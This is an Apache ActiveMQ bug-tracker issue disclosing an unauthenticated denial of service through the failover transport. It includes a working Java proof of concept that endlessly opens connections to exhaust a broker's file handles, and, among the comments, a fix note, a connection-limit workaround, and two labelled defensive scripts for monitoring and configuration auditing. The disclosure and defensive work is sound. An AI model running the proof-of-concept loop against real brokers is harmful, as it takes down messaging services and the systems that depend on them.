ActiveMQ / AMQ-3294

ActiveMQ failover Denial of Service

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 5.2.0, 5.5.0
    • Fix Version/s: 5.6.0
    • Component/s: Broker
    • Environment: Linux ubuntu 2.6.32-30-generic and other Linux versions

      Description

      Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can trigger a Denial of Service condition against the broker service.

      In detail, an attacker can issue multiple ActiveMQ openwire connection requests using the following connection string:
      failover:tcp://<IP>:61616

      Due to the 'failover' mechanism, all TCP connections remain active even if a valid session is not created.
      Please note that no valid credentials have been used.

      After a few thousand requests, a "java.net.SocketException: Too many open files" exception is triggered causing the freeze/crash of the broker. Connected systems may crash as well.

      During my test, the attack took around 4 minutes (in a local network) and it is highly reliable. This is most likely an abuse of the 'failover' functionality.

      I've been testing version 5.2.0 and also the latest 5.5.0 release. As both releases are affected, I assume that this issue is present in other versions as well. The problem appears in the default configuration as well as with different authentication plugins enabled.

      Proof-Of-Concept:

      --------------------
      package openwireclient;

      import javax.jms.*;
      import org.apache.activemq.ActiveMQConnectionFactory;

      public class GoAndCrash {

          // Broker host and port are appended from the command line (args[0], args[1]).
          private static String url = "failover:tcp://";

          public static void main(String[] args) throws JMSException {

              System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");

              url = url.concat(args[0] + ":" + args[1]);
              int cont = 0;

              while (true) {
                  try {
                      System.out.println("[*] Request #" + cont);
                      // Invalid credentials: the session is never established, but the
                      // failover transport keeps its TCP socket open on the broker side.
                      ConnectionFactory connectionFactory =
                          new ActiveMQConnectionFactory("invalidUser", "invalidPass", url);
                      Connection connection = connectionFactory.createConnection();
                      cont++;
                      connection.start();
                  } catch (Exception ex) {
                      // do nothing
                  }
              }
          }
      }
      --------------------
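The symptom the report describes is a broker whose file descriptors are held by thousands of idle OpenWire sockets from a client that never authenticates. One way to watch for that on the broker host, as an added example that is not part of this issue or the ActiveMQ project, is to count established connections to the broker port per peer address from `ss -tn` style output. The socket lines below are constructed for the example, and the alert threshold is an assumed operational value.

```python
"""Count established client connections to an ActiveMQ broker port per peer,
from `ss -tn` style socket-table output, and flag peers above a threshold.

Added example for AMQ-3294; not code from the issue or the ActiveMQ project.
The socket lines below are constructed; their column layout follows the
Linux `ss -tn` output format, and the threshold is an assumed operational value.
"""
from collections import Counter

BROKER_PORT = 61616  # default OpenWire port used in the report

# Constructed sample: two peers, one of them holding many idle sockets open,
# plus one socket to a different listener (8161) that must be ignored.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port       Peer Address:Port
ESTAB  0      0      10.0.0.5:61616           10.0.0.20:50412
ESTAB  0      0      10.0.0.5:61616           10.0.0.20:50413
ESTAB  0      0      10.0.0.5:61616           10.0.0.99:41000
ESTAB  0      0      10.0.0.5:61616           10.0.0.99:41001
ESTAB  0      0      10.0.0.5:61616           10.0.0.99:41002
ESTAB  0      0      10.0.0.5:8161            10.0.0.7:33010
ESTAB  0      0      [::ffff:10.0.0.5]:61616  [::ffff:10.0.0.99]:41003
"""


def split_host_port(endpoint):
    """Split 'host:port' or '[v6host]:port' into (host, port)."""
    host, _, port = endpoint.rpartition(":")
    host = host.strip("[]")
    if host.startswith("::ffff:"):  # IPv4-mapped IPv6: count with its IPv4 peer
        host = host[len("::ffff:"):]
    return host, int(port)


def connections_per_peer(ss_output, broker_port=BROKER_PORT):
    """Map peer address -> number of ESTAB sockets to broker_port."""
    counts = Counter()
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "ESTAB":
            continue  # header line, or a socket not in ESTAB state
        _, local_port = split_host_port(fields[3])
        if local_port != broker_port:
            continue  # some other listener on the broker host
        peer_host, _ = split_host_port(fields[4])
        counts[peer_host] += 1
    return counts


def peers_over_threshold(ss_output, threshold, broker_port=BROKER_PORT):
    """Peers holding at least `threshold` sockets open, highest count first."""
    counts = connections_per_peer(ss_output, broker_port)
    return sorted(((p, n) for p, n in counts.items() if n >= threshold),
                  key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    for peer, n in peers_over_threshold(SAMPLE_SS_OUTPUT, threshold=3):
        print(f"{peer}: {n} open connections to port {BROKER_PORT}")
```

In practice the input comes from `ss -tn` run periodically on the broker host; a per-peer count that climbs steadily while the broker logs no successful logins is the pattern this report describes, and the total across all peers can be compared against the process's open-file limit to see how much headroom remains.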

        Activity

        Rob Davies added a comment -

        Fixed by revision 1209700
        Luca Carettoni added a comment -

        Gary, thanks for your follow-up!
        Haven't tested it yet, but it indeed looks like a possible workaround, at least to avoid a brutal crash.

        I've just downloaded the latest stable (5.5.0) and it does not include this configuration option in any of the configuration templates. From the security standpoint, it would be great to see this transport option enabled by default with a reasonable value.
        Gary Tully added a comment -

        https://issues.apache.org/jira/browse/AMQ-1928 helps here: it allows you to limit the number of concurrent connections. Set this to 10 and the DoS attack will fail.
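The comment above points at the connection limit from AMQ-1928 but does not name the setting, and the following comment notes that the 5.5.0 configuration templates do not set it. As an added example, not part of this issue or the ActiveMQ project, the script below audits an activemq.xml for transport connectors that carry no ceiling. It assumes the option is the `maximumConnections` query parameter on the transportConnector URI (the option AMQ-1928 added); both configuration fragments are constructed for the example, the first showing the unbounded setting and the second the limited one.

```python
"""Audit an ActiveMQ broker configuration (activemq.xml) for transport
connectors that accept an unbounded number of client connections.

Added example for AMQ-3294; not code from the issue or the ActiveMQ project.
It assumes the `maximumConnections` transport option introduced by AMQ-1928,
given as a query parameter on the transportConnector URI. Both configuration
fragments below are constructed for this example.
"""
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Constructed sample: connectors with no connection ceiling (the weak setting).
WEAK_CONFIG = """\
<beans xmlns="http://www.springframework.org/schema/beans">
  <broker xmlns="http://activemq.apache.org/schema/core" brokerName="localhost">
    <transportConnectors>
      <transportConnector name="openwire" uri="tcp://0.0.0.0:61616"/>
      <transportConnector name="stomp" uri="stomp://0.0.0.0:61613"/>
    </transportConnectors>
  </broker>
</beans>
"""

# Constructed sample: the same connectors with a per-connector ceiling.
HARDENED_CONFIG = """\
<beans xmlns="http://www.springframework.org/schema/beans">
  <broker xmlns="http://activemq.apache.org/schema/core" brokerName="localhost">
    <transportConnectors>
      <transportConnector name="openwire"
          uri="tcp://0.0.0.0:61616?maximumConnections=1000&amp;wireFormat.maxFrameSize=104857600"/>
      <transportConnector name="stomp" uri="stomp://0.0.0.0:61613?maximumConnections=200"/>
    </transportConnectors>
  </broker>
</beans>
"""


def _local_name(tag):
    """Drop the XML namespace: '{ns}transportConnector' -> 'transportConnector'."""
    return tag.rsplit("}", 1)[-1]


def connector_limits(config_xml):
    """Map connector name -> maximumConnections value, or None when unset."""
    limits = {}
    for element in ET.fromstring(config_xml).iter():
        if _local_name(element.tag) != "transportConnector":
            continue
        uri = element.get("uri", "")
        _, _, query = uri.partition("?")  # transport options follow the '?' in the URI
        value = parse_qs(query).get("maximumConnections", [None])[0]
        limits[element.get("name", uri)] = int(value) if value is not None else None
    return limits


def unbounded_connectors(config_xml, ceiling=None):
    """Connector names with no limit, or with a limit above `ceiling` when given."""
    return sorted(name for name, limit in connector_limits(config_xml).items()
                  if limit is None or (ceiling is not None and limit > ceiling))


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{label}: unbounded connectors = {unbounded_connectors(cfg)}")
```

Run it against a real activemq.xml by reading the file into `unbounded_connectors`; the `ceiling` argument lets you also flag connectors whose limit is set but exceeds what the host's open-file limit can actually sustain, since the limit only helps if it is lower than the point at which the broker hits "Too many open files".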
        Luca Carettoni added a comment -

        After a few months, any update on this?

        Thanks,
        Luca

          People

          • Assignee: Rob Davies
          • Reporter: Luca Carettoni